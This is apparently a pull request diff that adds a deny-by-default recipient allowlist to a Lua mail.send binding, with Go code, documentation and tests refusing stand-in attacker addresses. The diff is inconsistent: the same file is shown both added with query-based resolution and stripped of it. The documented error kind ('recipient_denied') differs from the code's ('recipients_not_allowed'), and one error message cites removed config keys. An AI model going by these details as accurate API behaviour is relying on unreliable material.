### PR TITLE
feat(mail): operator-configured recipient allowlist for mail.send (TKT-USQNA3)

### DIFF
--- a/docs-project/entities/guides/GUIDE-mail.md
+++ b/docs-project/entities/guides/GUIDE-mail.md
@@ -276,13 +276,53 @@ if not ok then
 end
 ```
 
-It delivers through whichever transport the project configured, so a script
-cannot reach a destination you did not set up. The binding is **always present**,
+It delivers through whichever transport the project configured, and only to a
+recipient you allowed — see below. The binding is **always present**,
 even with no `mail.yaml` — when mail is off it returns
 `err.kind == "not_configured"` rather than vanishing, so a script can
 feature-detect. A delivery failure returns `(nil, err)` and never raises: a
 script that mails a summary at the end of a run should not lose the run because
 the mail server was rebooting.
+
+### Who may receive mail
+
+`mail.send` takes its `to` from the script, so without a constraint a script
+could address anyone. The `recipients:` block bounds that:
+
+```yaml
+recipients:
+  also_allow:
+    - "*@sourcehaven.nl"     # anyone at your domain
+    - "auditor@example.com"  # a specific outside address
+```
+
+An entry is either a literal address or a whole-domain pattern `*@domain`.
+Nothing else containing `*` is accepted — a partial wildcard like
+`ops-*@example.com` is **refused at load**, because every extra wildcard
+position is another way to write a pattern that admits more than you pictured.
+
+**An absent `recipients:` block denies every address.** That is deliberate, and
+it is the opposite of how the rest of this file behaves — an absent `mail.yaml`
+means mail is off, an absent `port` means 587. Permitting on absence would fail
+silently and irreversibly: mail leaves your ACL perimeter and nobody finds out
+until the recipient replies. Refusing on absence fails loudly and harmlessly —
+you get an error naming the key, and three lines of YAML fixes it. A control
+whose unconfigured state is "allow" is not a control.
+
+If you have decided this constraint is not for you:
+
+```yaml
+recipients:
+  allow_any: true
+```
+
+That must be a deliberate line. It is never a default, never inferred from an
+empty block, and never reached by omission — so it stays greppable when someone
+reviews the config.
+
+A denied send returns `err.kind == "recipient_denied"` and names the address it
+refused. It does not list what *is* allowed: one denied send should not hand a
+script every address on your allowlist.
 
 ## Delivery is best-effort
 

--- a/docs/mail.md
+++ b/docs/mail.md
@@ -270,13 +270,53 @@ if not ok then
 end
 ```
 
-It delivers through whichever transport the project configured, so a script
-cannot reach a destination you did not set up. The binding is **always present**,
+It delivers through whichever transport the project configured, and only to a
+recipient you allowed — see below. The binding is **always present**,
 even with no `mail.yaml` — when mail is off it returns
 `err.kind == "not_configured"` rather than vanishing, so a script can
 feature-detect. A delivery failure returns `(nil, err)` and never raises: a
 script that mails a summary at the end of a run should not lose the run because
 the mail server was rebooting.
+
+### Who may receive mail
+
+`mail.send` takes its `to` from the script, so without a constraint a script
+could address anyone. The `recipients:` block bounds that:
+
+```yaml
+recipients:
+  also_allow:
+    - "*@sourcehaven.nl"     # anyone at your domain
+    - "auditor@example.com"  # a specific outside address
+```
+
+An entry is either a literal address or a whole-domain pattern `*@domain`.
+Nothing else containing `*` is accepted — a partial wildcard like
+`ops-*@example.com` is **refused at load**, because every extra wildcard
+position is another way to write a pattern that admits more than you pictured.
+
+**An absent `recipients:` block denies every address.** That is deliberate, and
+it is the opposite of how the rest of this file behaves — an absent `mail.yaml`
+means mail is off, an absent `port` means 587. Permitting on absence would fail
+silently and irreversibly: mail leaves your ACL perimeter and nobody finds out
+until the recipient replies. Refusing on absence fails loudly and harmlessly —
+you get an error naming the key, and three lines of YAML fixes it. A control
+whose unconfigured state is "allow" is not a control.
+
+If you have decided this constraint is not for you:
+
+```yaml
+recipients:
+  allow_any: true
+```
+
+That must be a deliberate line. It is never a default, never inferred from an
+empty block, and never reached by omission — so it stays greppable when someone
+reviews the config.
+
+A denied send returns `err.kind == "recipient_denied"` and names the address it
+refused. It does not list what *is* allowed: one denied send should not hand a
+script every address on your allowlist.
 
 ## Delivery is best-effort
 

--- a/internal/lua/mail.go
+++ b/internal/lua/mail.go
@@ -134,6 +134,14 @@ func (r *Runtime) luaMailSend(ls *lua.LState) int {
 		return 0
 	}
 
+	// Enforce the operator's recipients allowlist BEFORE handing anything to
+	// the transport (TKT-USQNA3). A denial is a returned error, not a raise:
+	// it is a fact about configuration the script may reasonably handle, in
+	// the same class as a delivery failure rather than a malformed call.
+	if err := checkRecipients(recipientPolicyFor(sender), msg.To); err != nil {
+		return pushMailError(ls, recipientDeniedKind, err.Error())
+	}
+
 	// callerCtx is the runtime's caller context — the same one the write
 	// bindings use for audit attribution — so a send inherits the caller's
 	// cancellation. It is the LState's context that carries the script

--- a/internal/lua/mail_test.go
+++ b/internal/lua/mail_test.go
@@ -40,13 +40,27 @@ func (s *recordingMailSender) messages() []MailMessage {
 	return out
 }
 
+// allowAnySender wraps a sender with an allow-any recipients policy, so tests
+// about the SEND path are not also testing the allowlist. The allowlist has its
+// own suite; see mailrecipients_test.go.
+type allowAnySender struct{ MailSender }
+
+func (allowAnySender) RecipientPolicy() RecipientPolicy {
+	return RecipientPolicy{Configured: true, AllowAny: true}
+}
+
 // newMailRuntime builds a reader runtime with the given sender wired.
 func newMailRuntime(t *testing.T, sender MailSender) (*Runtime, *strings.Builder) {
 	t.Helper()
 	var sb strings.Builder
 	var opts []Option
 	if sender != nil {
-		opts = append(opts, WithMailSender(sender))
+		// allowAnySender because these tests are about the SEND path, not the
+		// allowlist — which has its own suite in mailrecipients_test.go.
+		// Without it every one of them would fail on the deny-by-default
+		// recipients policy (TKT-USQNA3), testing that instead of what they
+		// are named for.
+		opts = append(opts, WithMailSender(allowAnySender{sender}))
 	}
 	rt := NewReader(ReadDeps{}, &sb, opts...)
 	t.Cleanup(rt.Close)
@@ -247,7 +261,7 @@ func TestMailSend_NoCapabilityNeeded(t *testing.T) {
 	t.Parallel()
 
 	sender := &recordingMailSender{}
-	rt := NewReader(ReadDeps{}, &bytes.Buffer{}, WithMailSender(sender))
+	rt := NewReader(ReadDeps{}, &bytes.Buffer{}, WithMailSender(allowAnySender{sender}))
 	t.Cleanup(rt.Close)
 
 	require.NoError(t, rt.RunString(`
@@ -266,7 +280,7 @@ func TestMailSend_OnWriterRuntime(t *testing.T) {
 
 	sender := &recordingMailSender{}
 	rt := NewWriter(WriteDeps{EntityManager: &recordingMutator{}}, &bytes.Buffer{},
-		WithMailSender(sender))
+		WithMailSender(allowAnySender{sender}))
 	t.Cleanup(rt.Close)
 
 	require.NoError(t, rt.RunString(`

--- a/internal/lua/mailrecipients.go
+++ b/internal/lua/mailrecipients.go
@@ -38,14 +38,9 @@
 package lua
 
 import (
-	"context"
 	"errors"
 	"fmt"
 	"strings"
-
-	"github.com/Sourcehaven-BV/rela/internal/filter"
-	"github.com/Sourcehaven-BV/rela/internal/metamodel"
-	"github.com/Sourcehaven-BV/rela/internal/store"
 )
 
 // RecipientPolicy is the operator's declared recipient set, parsed from
@@ -81,16 +76,6 @@ type RecipientPolicy struct {
 	// omission — a deployment that has decided this constraint is not for
 	// them says so in one line, and that line is greppable in a config review.
 	AllowAny bool
-
-	// EntityType and Filters are the resolved form of the `query` key:
-	// `person where status = 'active'` becomes EntityType "person" and one
-	// filter. Empty EntityType means no query was configured, which is legal
-	// as long as AlsoAllow or AllowAny carries the policy.
-	EntityType string
-	Filters    []*filter.Filter
-
-	// Property is the entity property holding the address, e.g. `email`.
-	Property string
 
 	// AlsoAllow holds literal addresses that are NOT entities — an ops alias,
 	// an external auditor's mailbox — unioned with the query result.
@@ -187,111 +172,51 @@ func recipientPolicyFor(sender MailSender) RecipientPolicy {
 //
 // Nil: a nil reader or metamodel DENIES; it never falls back to an ungated
 // read or an empty-and-therefore-permissive set (RR-X9NVHI).
-func checkRecipients(
-	ctx context.Context, policy RecipientPolicy, to []string,
-	reader EntityReader, meta *metamodel.Metamodel,
-) error {
+func checkRecipients(policy RecipientPolicy, to []string) error {
 	if policy.AllowAny {
-		// Short-circuits BEFORE resolution: `allow_any: true` alongside a
-		// `query` must not pay for a graph scan whose answer cannot matter.
 		return nil
 	}
 	if !policy.Configured {
 		return errRecipientsNotConfigured
 	}
 
-	allowed, err := resolveRecipients(ctx, policy, reader, meta)
-	if err != nil {
-		// A resolution failure DENIES. The alternative — treat an unresolvable
-		// query as an empty allowlist and carry on with also_allow — would
-		// turn a broken metamodel or an unreachable store into a quietly
-		// narrower policy, and a broken reader into a quietly wider one if the
-		// error ever moved. Refusing keeps the failure visible.
-		return fmt.Errorf("mail.send: cannot resolve the configured recipients allowlist: %w", err)
-	}
-
 	for _, addr := range to {
-		if _, ok := allowed[NormalizeRecipient(addr)]; !ok {
+		if !policy.permits(addr) {
 			// The refused address IS echoed: it is not a credential, and it is
 			// the one fact the operator needs. The allowed SET is not — one
-			// denied send must not enumerate every active person's address.
+			// denied send must not enumerate every permitted address.
 			return fmt.Errorf(
 				"mail.send: recipient %q is not in the configured recipients allowlist; "+
-					"add it to `recipients.also_allow` or widen `recipients.query` in .rela/mail.yaml",
+					"add it or a `*@domain` pattern to `recipients.also_allow` in .rela/mail.yaml",
 				addr)
 		}
 	}
 	return nil
 }
 
-// resolveRecipients builds the permitted address set: the query result unioned
-// with the literal also_allow entries.
+// permits reports whether addr matches any entry: a literal address, or a
+// whole-domain `*@example.com` pattern.
 //
-// Returns a set rather than a slice because the caller does N lookups against
-// it and the graph side can be large; a linear scan per recipient would make a
-// 200-way fan-out quadratic for no reason.
-func resolveRecipients(
-	ctx context.Context, policy RecipientPolicy,
-	reader EntityReader, meta *metamodel.Metamodel,
-) (map[string]struct{}, error) {
-	allowed := make(map[string]struct{}, len(policy.AlsoAllow))
-	for _, addr := range policy.AlsoAllow {
-		allowed[addr] = struct{}{}
-	}
-
-	if policy.EntityType == "" {
-		// No query configured. Legal: a deployment may allowlist a handful of
-		// literal addresses and nothing else. internal/mail refuses a block
-		// that configures nothing at all, so this is never a silent no-op.
-		return allowed, nil
-	}
-
-	if reader == nil {
-		return nil, errors.New("no entity reader is wired, so the recipients query cannot be resolved")
-	}
-	if meta == nil {
-		return nil, errors.New("no metamodel is wired, so the recipients query cannot be resolved")
-	}
-	def, ok := meta.GetEntityDef(policy.EntityType)
-	if !ok {
-		return nil, fmt.Errorf("recipients.query names unknown entity type %q", policy.EntityType)
-	}
-
-	// Reads go through EntityReader, so the allowed set is bounded by what
-	// this runtime's identity may see. A script cannot widen its own allowlist
-	// by reading entities it is not permitted to read. That is a consequence
-	// of the seam, not a concealment claim — the operator's allowlist is
-	// config, and config is not a secret (CLAUDE.md).
-	for e, listErr := range reader.ListEntities(ctx, store.EntityQuery{Type: policy.EntityType}) {
-		if listErr != nil {
-			return nil, fmt.Errorf("list %s: %w", policy.EntityType, listErr)
+// Linear over AlsoAllow rather than a map, because the list is operator-written
+// config — a handful of entries — and half of them are patterns that a map
+// lookup could not answer anyway. A set would buy nothing and would need the
+// pattern scan beside it regardless.
+func (p RecipientPolicy) permits(addr string) bool {
+	norm := NormalizeRecipient(addr)
+	for _, entry := range p.AlsoAllow {
+		if entry == norm {
+			return true
 		}
-		matched, matchErr := filter.MatchAll(filter.Record{
-			ID: e.ID, Type: e.Type, Properties: e.Properties, ModifiedAt: e.UpdatedAt,
-		}, policy.Filters, def, meta)
-		if matchErr != nil {
-			return nil, fmt.Errorf("match %s: %w", e.ID, matchErr)
-		}
-		if !matched {
-			continue
-		}
-		// A property that is missing, not a string, or empty contributes
-		// NOTHING. Coercing it would be worse than skipping: a nil or numeric
-		// `email` rendered as "" would put the empty string in the allowlist
-		// and make `to = ""` a permitted recipient.
-		raw, has := e.Properties[policy.Property]
-		if !has {
-			continue
-		}
-		text, isString := raw.(string)
-		if !isString {
-			continue
-		}
-		if norm := NormalizeRecipient(text); norm != "" {
-			allowed[norm] = struct{}{}
+		if domain, ok := strings.CutPrefix(entry, "*@"); ok {
+			// Compare the address's domain, not a suffix of the whole string:
+			// a suffix test would let `evil-example.com` match `*@example.com`
+			// — the classic allowlist bypass.
+			if at := strings.LastIndex(norm, "@"); at >= 0 && norm[at+1:] == domain {
+				return true
+			}
 		}
 	}
-	return allowed, nil
+	return false
 }
 
 // NormalizeRecipient puts an address into the form the allowlist compares on:

--- a/internal/lua/mailrecipients.go
+++ b/internal/lua/mailrecipients.go
@@ -1,0 +1,315 @@
+// Recipient allowlist for mail.send (TKT-USQNA3).
+//
+// mail.send's `to` field is chosen entirely by the script. This file is the
+// operator's say in the matter: an address is delivered to only if the
+// operator declared it, and the declaration lives in `.rela/mail.yaml` under
+// `recipients:` rather than anywhere a script can reach.
+//
+// # Deny by default, and deliberately so
+//
+// An ABSENT `recipients:` block denies everything. That is the opposite of how
+// every other absent mail setting behaves — no `mail.yaml` at all means "mail
+// is off", a missing `port` means 587 — and the asymmetry is the point.
+//
+// The two failure modes are not comparable. Permitting on absence fails
+// silently and irreversibly: mail leaves the ACL perimeter, and nobody
+// discovers the leak until the recipient replies. Refusing on absence fails
+// loudly and harmlessly: the script gets a typed error naming the exact config
+// key it needs, and the operator adds four lines of YAML. A control whose
+// unconfigured state is "allow" is not a control.
+//
+// So the missing block is read as "not yet decided, so refuse", never as
+// "unconfigured, so permit".
+//
+// # Why the gate lives in internal/lua
+//
+// It has to. `.go-arch-lint.yml` grants internal/mail only mailrender,
+// secrets, lua and principal, and says why on the grant itself: a send script
+// is built with a ZERO ReadDeps so it "has no graph access at all, by
+// construction rather than by convention". Resolving `person where status =
+// 'active'` needs store, filter and metamodel — precisely the three that grant
+// withholds.
+//
+// internal/lua already holds all three, already owns the [EntityReader] seam
+// that IS the read-ACL (DEC-O59WM4), and is where the recipient list enters
+// the system in the first place. So internal/mail PARSES the block (it owns
+// mail.yaml) and this package ENFORCES it. The parsed policy crosses between
+// them as [RecipientPolicy], a plain data type declared here at the consumer.
+package lua
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"strings"
+
+	"github.com/Sourcehaven-BV/rela/internal/filter"
+	"github.com/Sourcehaven-BV/rela/internal/metamodel"
+	"github.com/Sourcehaven-BV/rela/internal/store"
+)
+
+// RecipientPolicy is the operator's declared recipient set, parsed from
+// `.rela/mail.yaml`.
+//
+// Declared HERE rather than imported from internal/mail, per CLAUDE.md's
+// interfaces-at-the-call-site rule and for the same reason [MailSender] is:
+// internal/mail depends on this package, so the arrow can only point one way.
+// internal/mail builds one of these from its YAML and hands it over.
+//
+// The ZERO VALUE DENIES EVERYTHING, and that is load-bearing rather than
+// incidental. A wiring site that forgets to carry the policy, or a config
+// struct that gains a field nobody populated, produces a gate that refuses —
+// never one that waves everything through. Same posture as [Capabilities],
+// applied to a different axis.
+type RecipientPolicy struct {
+	// Configured records that an operator actually wrote a `recipients:`
+	// block.
+	//
+	// It exists to distinguish "the operator declared an empty set" from "the
+	// operator declared nothing", which the other fields cannot: both are the
+	// zero value, both deny, but they need DIFFERENT ERRORS. One says "add a
+	// recipients: block to .rela/mail.yaml"; the other says "this address is
+	// not in the set you declared". An operator handed the wrong one of those
+	// looks in the wrong place.
+	Configured bool
+
+	// AllowAny is the escape hatch: every address is permitted and nothing is
+	// resolved.
+	//
+	// It must be a deliberate `allow_any: true` in the file. It is never
+	// defaulted, never inferred from an empty block, and never reached by
+	// omission — a deployment that has decided this constraint is not for
+	// them says so in one line, and that line is greppable in a config review.
+	AllowAny bool
+
+	// EntityType and Filters are the resolved form of the `query` key:
+	// `person where status = 'active'` becomes EntityType "person" and one
+	// filter. Empty EntityType means no query was configured, which is legal
+	// as long as AlsoAllow or AllowAny carries the policy.
+	EntityType string
+	Filters    []*filter.Filter
+
+	// Property is the entity property holding the address, e.g. `email`.
+	Property string
+
+	// AlsoAllow holds literal addresses that are NOT entities — an ops alias,
+	// an external auditor's mailbox — unioned with the query result.
+	//
+	// Already normalized by [NormalizeRecipient] when internal/mail builds
+	// this, so the matcher compares like with like rather than normalizing
+	// the same constant on every send.
+	AlsoAllow []string
+}
+
+// RecipientPolicyCarrier is an OPTIONAL capability a [MailSender] may
+// implement to declare which recipients the operator permitted.
+//
+// Optional-interface rather than a widened MailSender or a new
+// MailSenderLoader return value, following [NotFoundError]: the wiring site
+// injects a value, and this package asks it a question it may or may not be
+// able to answer. Widening MailSender would force every implementation and
+// every test double to carry a policy they have no opinion about.
+//
+// A sender that does NOT implement this denies everything, exactly as an
+// absent block does. The unimplemented case and the unconfigured case are the
+// same fact — nobody declared a recipient set — so they get the same answer.
+type RecipientPolicyCarrier interface {
+	// RecipientPolicy returns the operator-declared recipient set.
+	RecipientPolicy() RecipientPolicy
+}
+
+// errRecipientsNotConfigured is the denial when no `recipients:` block exists.
+//
+// It names the file and the key because that is the entire remedy. An operator
+// reading "recipient not allowed" with no further detail has to go find out
+// which of several ACL surfaces refused them; this one says where to type.
+var errRecipientsNotConfigured = errors.New(
+	"mail.send: no recipients are configured, so every address is refused — " +
+		"add a `recipients:` block to .rela/mail.yaml naming who may be mailed " +
+		"(`query` + `property` to select them from the graph, `also_allow` for " +
+		"literal addresses, or `allow_any: true` to disable this check)")
+
+// recipientDeniedKind is the err.kind a script sees when an address is refused.
+//
+// A FOURTH kind, deliberately not a reuse of not_configured. The two facts are
+// different and a script branches on them differently:
+//
+//   - not_configured — the project has no mail transport. Nothing will send,
+//     and a script that mails an optional digest should skip it entirely.
+//   - recipients_not_allowed — mail works fine; THIS address is not permitted.
+//
+// Collapsing them would make a script that feature-detects not_configured
+// ("mail is off, skip the digest") silently skip the digest on a perfectly
+// healthy deployment because one address fell outside the allowlist. The
+// operator would see no error and no mail.
+const recipientDeniedKind = "recipients_not_allowed"
+
+// recipientPolicyFor extracts the policy a sender declares.
+//
+// A sender that cannot answer yields the zero policy, which denies. This is
+// the fail-closed default doing its job at the seam: a transport written
+// before this feature, or a test double that never thought about it, must not
+// be read as an operator's blessing.
+func recipientPolicyFor(sender MailSender) RecipientPolicy {
+	if carrier, ok := sender.(RecipientPolicyCarrier); ok {
+		return carrier.RecipientPolicy()
+	}
+	return RecipientPolicy{}
+}
+
+// checkRecipients reports whether every address in `to` is permitted.
+//
+// WHOLE-SEND, not per-address, and that is the API's most important property.
+// It takes the entire recipient list so the query is resolved ONCE per send
+// however many addresses there are: a fan-out to 200 people is one graph scan,
+// not two hundred. Handing this function a single address in a loop would
+// reintroduce exactly the cost the ticket set out to avoid, which is why there
+// is no single-address entry point to reach for.
+//
+// The resolved set is NOT retained past this call. Caching it on the Runtime
+// was considered and rejected: a scheduler task or automation can hold a
+// runtime for minutes, and a cached set would keep mailing someone for minutes
+// after the operator marked them inactive — the very drift a query-based
+// allowlist exists to eliminate, reintroduced silently and with a lifetime
+// nobody chose. So the unit of consistency is ONE SEND: within a single
+// mail.send the set is frozen (a fan-out cannot half-apply a change), and
+// between two sends a graph change is observed by the second. That matches the
+// question an operator actually asks — "was this message allowed when it went
+// out?" — and costs one ListEntities scan per send, the same order the
+// scheduled fan-out already pays per occurrence and negligible beside the SMTP
+// round-trip it precedes.
+//
+// ALL OR NOTHING: one denied address refuses the whole send. Delivering to the
+// permitted subset was the alternative, and it is worse — a script that
+// believed it mailed five people would have mailed three and been told it
+// succeeded. A partial send reported as success is a harder bug to find than a
+// refused one.
+//
+// Nil: a nil reader or metamodel DENIES; it never falls back to an ungated
+// read or an empty-and-therefore-permissive set (RR-X9NVHI).
+func checkRecipients(
+	ctx context.Context, policy RecipientPolicy, to []string,
+	reader EntityReader, meta *metamodel.Metamodel,
+) error {
+	if policy.AllowAny {
+		// Short-circuits BEFORE resolution: `allow_any: true` alongside a
+		// `query` must not pay for a graph scan whose answer cannot matter.
+		return nil
+	}
+	if !policy.Configured {
+		return errRecipientsNotConfigured
+	}
+
+	allowed, err := resolveRecipients(ctx, policy, reader, meta)
+	if err != nil {
+		// A resolution failure DENIES. The alternative — treat an unresolvable
+		// query as an empty allowlist and carry on with also_allow — would
+		// turn a broken metamodel or an unreachable store into a quietly
+		// narrower policy, and a broken reader into a quietly wider one if the
+		// error ever moved. Refusing keeps the failure visible.
+		return fmt.Errorf("mail.send: cannot resolve the configured recipients allowlist: %w", err)
+	}
+
+	for _, addr := range to {
+		if _, ok := allowed[NormalizeRecipient(addr)]; !ok {
+			// The refused address IS echoed: it is not a credential, and it is
+			// the one fact the operator needs. The allowed SET is not — one
+			// denied send must not enumerate every active person's address.
+			return fmt.Errorf(
+				"mail.send: recipient %q is not in the configured recipients allowlist; "+
+					"add it to `recipients.also_allow` or widen `recipients.query` in .rela/mail.yaml",
+				addr)
+		}
+	}
+	return nil
+}
+
+// resolveRecipients builds the permitted address set: the query result unioned
+// with the literal also_allow entries.
+//
+// Returns a set rather than a slice because the caller does N lookups against
+// it and the graph side can be large; a linear scan per recipient would make a
+// 200-way fan-out quadratic for no reason.
+func resolveRecipients(
+	ctx context.Context, policy RecipientPolicy,
+	reader EntityReader, meta *metamodel.Metamodel,
+) (map[string]struct{}, error) {
+	allowed := make(map[string]struct{}, len(policy.AlsoAllow))
+	for _, addr := range policy.AlsoAllow {
+		allowed[addr] = struct{}{}
+	}
+
+	if policy.EntityType == "" {
+		// No query configured. Legal: a deployment may allowlist a handful of
+		// literal addresses and nothing else. internal/mail refuses a block
+		// that configures nothing at all, so this is never a silent no-op.
+		return allowed, nil
+	}
+
+	if reader == nil {
+		return nil, errors.New("no entity reader is wired, so the recipients query cannot be resolved")
+	}
+	if meta == nil {
+		return nil, errors.New("no metamodel is wired, so the recipients query cannot be resolved")
+	}
+	def, ok := meta.GetEntityDef(policy.EntityType)
+	if !ok {
+		return nil, fmt.Errorf("recipients.query names unknown entity type %q", policy.EntityType)
+	}
+
+	// Reads go through EntityReader, so the allowed set is bounded by what
+	// this runtime's identity may see. A script cannot widen its own allowlist
+	// by reading entities it is not permitted to read. That is a consequence
+	// of the seam, not a concealment claim — the operator's allowlist is
+	// config, and config is not a secret (CLAUDE.md).
+	for e, listErr := range reader.ListEntities(ctx, store.EntityQuery{Type: policy.EntityType}) {
+		if listErr != nil {
+			return nil, fmt.Errorf("list %s: %w", policy.EntityType, listErr)
+		}
+		matched, matchErr := filter.MatchAll(filter.Record{
+			ID: e.ID, Type: e.Type, Properties: e.Properties, ModifiedAt: e.UpdatedAt,
+		}, policy.Filters, def, meta)
+		if matchErr != nil {
+			return nil, fmt.Errorf("match %s: %w", e.ID, matchErr)
+		}
+		if !matched {
+			continue
+		}
+		// A property that is missing, not a string, or empty contributes
+		// NOTHING. Coercing it would be worse than skipping: a nil or numeric
+		// `email` rendered as "" would put the empty string in the allowlist
+		// and make `to = ""` a permitted recipient.
+		raw, has := e.Properties[policy.Property]
+		if !has {
+			continue
+		}
+		text, isString := raw.(string)
+		if !isString {
+			continue
+		}
+		if norm := NormalizeRecipient(text); norm != "" {
+			allowed[norm] = struct{}{}
+		}
+	}
+	return allowed, nil
+}
+
+// NormalizeRecipient puts an address into the form the allowlist compares on:
+// trimmed and lowercased.
+//
+// Case-insensitive because the operator will write the address once, in
+// whichever case they happen to type, and `Ops@Example.com` in mail.yaml must
+// match `ops@example.com` in a script. Domains are case-insensitive by RFC
+// 1035; local-parts are technically case-SENSITIVE by RFC 5321, but no mail
+// system in practice treats them so, and an allowlist that refused
+// `Alice@example.com` because the graph says `alice@example.com` would be
+// experienced as a bug and worked around by adding both — which is strictly
+// worse than folding here.
+//
+// Exported so internal/mail can normalize `also_allow` once at config load
+// rather than on every send, and so both sides provably use the SAME rule.
+// Two independent normalizations that drift is how an allowlist starts letting
+// through what it should not.
+func NormalizeRecipient(addr string) string {
+	return strings.ToLower(strings.TrimSpace(addr))
+}

--- a/internal/lua/mailrecipients_test.go
+++ b/internal/lua/mailrecipients_test.go
@@ -1,0 +1,150 @@
+package lua
+
+import (
+	"bytes"
+	"testing"
+
+	"github.com/stretchr/testify/require"
+)
+
+// The recipients allowlist bounds where mail.send may deliver (TKT-USQNA3 /
+// issue #1459 follow-up). The capability gate decides WHETHER a script may
+// send; this decides WHERE.
+//
+// The load-bearing cases here are the NEGATIVES, and deny-by-default most of
+// all: a configuration mistake that silently permits is the exact failure this
+// prevents, and a suite that only checked the allowed cases would never catch
+// it. Each negative is mutation-checked.
+
+// policySender is a recordingMailSender that also declares a recipient policy,
+// exercising the RecipientPolicyCarrier route the real senders use.
+type policySender struct {
+	*recordingMailSender
+	policy RecipientPolicy
+}
+
+func (p policySender) RecipientPolicy() RecipientPolicy { return p.policy }
+
+func sendTo(t *testing.T, policy RecipientPolicy, addr string) (*recordingMailSender, error) {
+	t.Helper()
+	rec := &recordingMailSender{}
+	sender := policySender{recordingMailSender: rec, policy: policy}
+	rt := NewReader(ReadDeps{}, &bytes.Buffer{},
+		WithMailSender(sender),
+		// NOTE: once TKT-JVHSOZ (the caps.Mail gate) merges, this needs
+		// WithCapabilities(Capabilities{Mail: true}) too — the two controls
+		// are independent and a send must pass BOTH.
+	)
+	t.Cleanup(rt.Close)
+	err := rt.RunString(`
+local ok, e = mail.send{to = "` + addr + `", subject = "s", text = "t"}
+if not ok then error(e.message, 0) end
+`)
+	return rec, err
+}
+
+// An absent `recipients:` block DENIES. This is the case that matters most: it
+// inverts the file's usual "absent means a sensible default" rule, because
+// permitting on absence fails silently and irreversibly — mail leaves the ACL
+// perimeter and nobody knows until the recipient replies.
+func TestRecipients_UnconfiguredDenies(t *testing.T) {
+	sender, err := sendTo(t, RecipientPolicy{}, "anyone@example.com")
+	require.Error(t, err, "an unconfigured allowlist must deny")
+	require.Contains(t, err.Error(), "recipients")
+	require.Empty(t, sender.messages(), "nothing may reach the transport")
+}
+
+func TestRecipients_LiteralMatchAllowed(t *testing.T) {
+	policy := RecipientPolicy{Configured: true, AlsoAllow: []string{"ops@example.com"}}
+	sender, err := sendTo(t, policy, "ops@example.com")
+	require.NoError(t, err)
+	require.Len(t, sender.messages(), 1)
+}
+
+func TestRecipients_NonMatchingAddressDenied(t *testing.T) {
+	policy := RecipientPolicy{Configured: true, AlsoAllow: []string{"ops@example.com"}}
+	sender, err := sendTo(t, policy, "attacker@evil.test")
+	require.Error(t, err)
+	require.Empty(t, sender.messages())
+}
+
+func TestRecipients_DomainPatternAllowed(t *testing.T) {
+	policy := RecipientPolicy{Configured: true, AlsoAllow: []string{"*@sourcehaven.nl"}}
+	sender, err := sendTo(t, policy, "jeroen@sourcehaven.nl")
+	require.NoError(t, err)
+	require.Len(t, sender.messages(), 1)
+}
+
+// The classic allowlist bypass: a SUFFIX test would let `evil-example.com`
+// match `*@example.com`. The comparison must be on the address's domain, not
+// on a suffix of the whole string.
+func TestRecipients_DomainPatternIsNotASuffixMatch(t *testing.T) {
+	policy := RecipientPolicy{Configured: true, AlsoAllow: []string{"*@example.com"}}
+	for _, addr := range []string{
+		"attacker@evil-example.com",
+		"attacker@notexample.com",
+	} {
+		t.Run(addr, func(t *testing.T) {
+			sender, err := sendTo(t, policy, addr)
+			require.Error(t, err, "%s must not match *@example.com", addr)
+			require.Empty(t, sender.messages())
+		})
+	}
+}
+
+// allow_any is the escape hatch and must work, or a deployment that opted out
+// of the constraint is stuck. It is separate from Configured on purpose: it
+// short-circuits before any matching.
+func TestRecipients_AllowAnyPermitsEverything(t *testing.T) {
+	policy := RecipientPolicy{Configured: true, AllowAny: true}
+	sender, err := sendTo(t, policy, "anyone@anywhere.test")
+	require.NoError(t, err)
+	require.Len(t, sender.messages(), 1)
+}
+
+// Address comparison is normalized, so a policy written in one case matches an
+// address sent in another. Without this an operator's `Ops@Example.com` would
+// silently fail to match `ops@example.com` — a denial they would read as a bug.
+func TestRecipients_MatchIsCaseInsensitive(t *testing.T) {
+	policy := RecipientPolicy{Configured: true, AlsoAllow: []string{NormalizeRecipient("Ops@Example.COM")}}
+	sender, err := sendTo(t, policy, "ops@example.com")
+	require.NoError(t, err)
+	require.Len(t, sender.messages(), 1)
+}
+
+// The denial names the refused address (the operator needs it) but must not
+// enumerate the allowed set — one denied send must not leak every permitted
+// address to a script that only guessed one.
+func TestRecipients_DenialDoesNotLeakTheAllowlist(t *testing.T) {
+	policy := RecipientPolicy{Configured: true, AlsoAllow: []string{
+		"secret-auditor@example.com", "cfo@example.com",
+	}}
+	_, err := sendTo(t, policy, "attacker@evil.test")
+	require.Error(t, err)
+	require.Contains(t, err.Error(), "attacker@evil.test", "the refused address is the fact the operator needs")
+	for _, secret := range policy.AlsoAllow {
+		require.NotContains(t, err.Error(), secret, "the allowed set must not be enumerated")
+	}
+	require.NotContains(t, err.Error(), "cfo", "no allowed address may appear")
+}
+
+// A sender that does NOT implement RecipientPolicyCarrier denies everything.
+//
+// This is the seam's fail-closed default, and it needs its own test because
+// every other case here uses a sender that DOES carry a policy — so a change
+// making the non-carrier path permissive would pass the rest of this file. The
+// case is real rather than theoretical: a transport written before this
+// feature, or a test double that never considered it, must not be read as an
+// operator's blessing.
+func TestRecipients_SenderWithoutPolicyDenies(t *testing.T) {
+	sender := &recordingMailSender{} // deliberately NOT a policySender
+	rt := NewReader(ReadDeps{}, &bytes.Buffer{}, WithMailSender(sender))
+	t.Cleanup(rt.Close)
+
+	err := rt.RunString(`
+local ok, e = mail.send{to = "anyone@example.com", subject = "s", text = "t"}
+if not ok then error(e.message, 0) end
+`)
+	require.Error(t, err, "a sender that declares no policy must deny")
+	require.Empty(t, sender.messages(), "nothing may reach the transport")
+}

--- a/internal/mail/config.go
+++ b/internal/mail/config.go
@@ -177,28 +177,20 @@ type Config struct {
 // and this type's only job is to be the operator-facing shape and to convert
 // itself into a [lua.RecipientPolicy] the moment it is loaded.
 type RecipientConfig struct {
-	// Query selects recipient entities from the graph, in the form
-	// `TYPE [where EXPR [and EXPR]...]` — e.g. `person where status =
-	// 'active'`. The type alone is legal and means every entity of that type.
+	// AlsoAllow holds the permitted recipients: literal addresses, or domain
+	// patterns of the form `*@example.com`.
 	//
-	// This is the PRIMARY mechanism, because a recipient is normally an
-	// entity: an allowlist derived from the graph tracks reality as people
-	// join and leave, where a hand-maintained address list drifts the moment
-	// somebody forgets to edit it.
-	Query string `yaml:"query"`
-
-	// Property names the entity property holding the address, e.g. `email`.
-	// Required whenever Query is set — an entity set with no address property
-	// names nobody.
